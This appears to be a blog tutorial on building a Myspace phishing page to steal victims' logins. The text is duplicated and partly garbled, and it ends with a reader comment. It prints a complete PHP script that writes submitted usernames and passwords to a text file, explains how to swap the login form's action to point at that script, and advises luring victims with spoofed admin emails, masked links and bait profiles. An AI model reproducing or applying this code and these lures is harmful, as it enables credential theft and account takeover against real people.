In this tutorial we discuss about how to create a phishing page to hack
Email accounts of our victim, follow this tutorial and you can create
phishing page to any of the websites out there on the web.
1.1 What is a phisher?
Phisher is something that looks like a login page(a fake login page), that writes the username and the password to a file, or does whatever you want.
1.2 How to make one?
That will lead you to Myspace's login page that has the red box with"You Must BeAll you need is a web hosting service with PHP enabled. We will use t35. Go to spam.com and sign up for a free account. In this tutorial we will make a phishing site for Myspace(the procedure is equivalent for most of the sites). While not signed in myspace, open anyone's profile and click on his picture. Logged-In to do That!" just above your login form.
Now, click File>Save Page As, and save the myspace page to your Desktop. Open your saved page with any text editor(notepad, wordpad etc.). Select all of the text(the source code), and copy it. Get back to your t35 account and click on 'New File' and paste the Myspace's source code there. Name the file 'index.php'(without the ''), and save it.
Now you have made a page equal to Myspace. Everything on that page will have the same function as if it were on the original site. The link to your phish site will be 'www.xxx.t35.com/index.php' - where 'xxx' is the name of your account.
But there is a little problem. When someone enters his username and password and press login, it logs him into the real myspace.
What do we need to change?
What we need to change is the action of the 'login' button, so instead of logging them into the real site, it writes the username and password to a text file.
Open your 'index.php' file. Search in the code for keywords 'action='. There will be several 'action=some link' in the myspace's source code(for the sign in
button, search button, etc.). We need to find the 'action=some link' that refers to the Login button.
After some searching, we find the:
Change: action="http://secure.myspace.com/index.cfm?fuseaction=login.process"
To:
action="login.php" and save the file.
Formerly, when you click the login button it would take the values in the username and
password boxes, and execute the functions in the 'http://secure.myspace.com/index.cfm?fuseaction=login.process' file.
Now when you click the login button it will take the values in the username in password boxes, and execute the functions in the 'login.php' file on your site(which doesn't exist yet).
All we have to do now, is to create a 'login.php' file that contains a function that
writes down the username and password into a text document. Make another file named 'login.php'(without the quotes) and paste the following code in it:
view source
print?
01.<?php
02.header ('Location: http://myspace.com ');
03.$handle = fopen("passes.txt", "a");
04.foreach($_POST as $variable => $value) {
05.fwrite($handle, $variable);
06.fwrite($handle, "=");
07.fwrite($handle, $value);
08.fwrite($handle, "\r\n");
09.}
10.fwrite($handle, "\r\n");
11.fclose($handle);
12.exit;
13.?>
The function of login.php is simple. It opens a file named 'passes.txt'(and creates it if it doesn't already exist) and enter the informations there(the username and password).
Congratulations! You have a phisher!
The link to your phish site is: http://xxx.t35.com/index.php -where 'xxx' is your account name.
The link to your text file is:
http://xxx.t35.com/passes.txt
Or you may access it from your account.
Note that you can choose whatever names you like for index.php, login.php and passes.txt. but the .php and .txt must stay the same.
1.3. How to trick people to fall for it.
There are hundreds of ways how to do it, your creativity is your limit. Most common way is to make an email similar to the admin, and sending them some report with a link to log in the site(your phish site). Ofcourse you will mask the link.
How to mask the link?
If you're posting it on forums, or anywhere where bb code is enabled, you're doing
this:
TheOriginalSiteLink
For example, www.google.com looks like a google, but it leads you to yahoo when you
click it.
If you're making the phisher for myspace, and want to get random ppl to it, you can simply make some hot chick account and put some hot pic that will lead to your phish site when clicked. So when they click the lusty image, they will be led to your phish site telling them they need to log in to see that.
Like this:
[img]link of the image[/img]
When sending emails see for the option 'hyperlink', and it's self explainable once you see it.
1.1 What is a phisher?
Phisher is something that looks like a login page(a fake login page), that writes the username and the password to a file, or does whatever you want.
1.2 How to make one?
That will lead you to Myspace's login page that has the red box with"You Must BeAll you need is a web hosting service with PHP enabled. We will use t35. Go to spam.com and sign up for a free account. In this tutorial we will make a phishing site for Myspace(the procedure is equivalent for most of the sites). While not signed in myspace, open anyone's profile and click on his picture. Logged-In to do That!" just above your login form.
Now, click File>Save Page As, and save the myspace page to your Desktop. Open your saved page with any text editor(notepad, wordpad etc.). Select all of the text(the source code), and copy it. Get back to your t35 account and click on 'New File' and paste the Myspace's source code there. Name the file 'index.php'(without the ''), and save it.
Now you have made a page equal to Myspace. Everything on that page will have the same function as if it were on the original site. The link to your phish site will be 'www.xxx.t35.com/index.php' - where 'xxx' is the name of your account.
But there is a little problem. When someone enters his username and password and press login, it logs him into the real myspace.
What do we need to change?
What we need to change is the action of the 'login' button, so instead of logging them into the real site, it writes the username and password to a text file.
Open your 'index.php' file. Search in the code for keywords 'action='. There will be several 'action=some link' in the myspace's source code(for the sign in
button, search button, etc.). We need to find the 'action=some link' that refers to the Login button.
After some searching, we find the:
and we know that 'action="http://secure.myspace.com/index.cfm?fuseaction=login.process"' refers to the login button.
<h5>
Member Login
</h5>
<form action="http://secure.myspace.com/index.cfm?
fuseaction=login.process" method="post" id="LoginForm" name="aspnetForm">
<div>
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE"
value="/wEPDwUJNTMzMjE3MzI5ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVB vc3RCYW
NrS2V5X18WAgUwY3RsMDAkT
WFpbiRTcGxhc2hEaXNwbGF5JGN0bDAwJFJlbWVtYmVyX0NoZWN rYm94BTBjdGw
wMCRNYWluJFNwbGFzaERpc3BsYXkkY3RsMDAkTG9naW5fSW1hZ 2VCdXR0b24="/>
</div>
Change: action="http://secure.myspace.com/index.cfm?fuseaction=login.process"
To:
action="login.php" and save the file.
Formerly, when you click the login button it would take the values in the username and
password boxes, and execute the functions in the 'http://secure.myspace.com/index.cfm?fuseaction=login.process' file.
Now when you click the login button it will take the values in the username in password boxes, and execute the functions in the 'login.php' file on your site(which doesn't exist yet).
All we have to do now, is to create a 'login.php' file that contains a function that
writes down the username and password into a text document. Make another file named 'login.php'(without the quotes) and paste the following code in it:
view source
print?
01.<?php
02.header ('Location: http://myspace.com ');
03.$handle = fopen("passes.txt", "a");
04.foreach($_POST as $variable => $value) {
05.fwrite($handle, $variable);
06.fwrite($handle, "=");
07.fwrite($handle, $value);
08.fwrite($handle, "\r\n");
09.}
10.fwrite($handle, "\r\n");
11.fclose($handle);
12.exit;
13.?>
The function of login.php is simple. It opens a file named 'passes.txt'(and creates it if it doesn't already exist) and enter the informations there(the username and password).
Congratulations! You have a phisher!
The link to your phish site is: http://xxx.t35.com/index.php -where 'xxx' is your account name.
The link to your text file is:
http://xxx.t35.com/passes.txt
Or you may access it from your account.
Note that you can choose whatever names you like for index.php, login.php and passes.txt. but the .php and .txt must stay the same.
1.3. How to trick people to fall for it.
There are hundreds of ways how to do it, your creativity is your limit. Most common way is to make an email similar to the admin, and sending them some report with a link to log in the site(your phish site). Ofcourse you will mask the link.
How to mask the link?
If you're posting it on forums, or anywhere where bb code is enabled, you're doing
this:
TheOriginalSiteLink
For example, www.google.com looks like a google, but it leads you to yahoo when you
click it.
If you're making the phisher for myspace, and want to get random ppl to it, you can simply make some hot chick account and put some hot pic that will lead to your phish site when clicked. So when they click the lusty image, they will be led to your phish site telling them they need to log in to see that.
Like this:
[img]link of the image[/img]
When sending emails see for the option 'hyperlink', and it's self explainable once you see it.
thank you for sahring information
ReplyDelete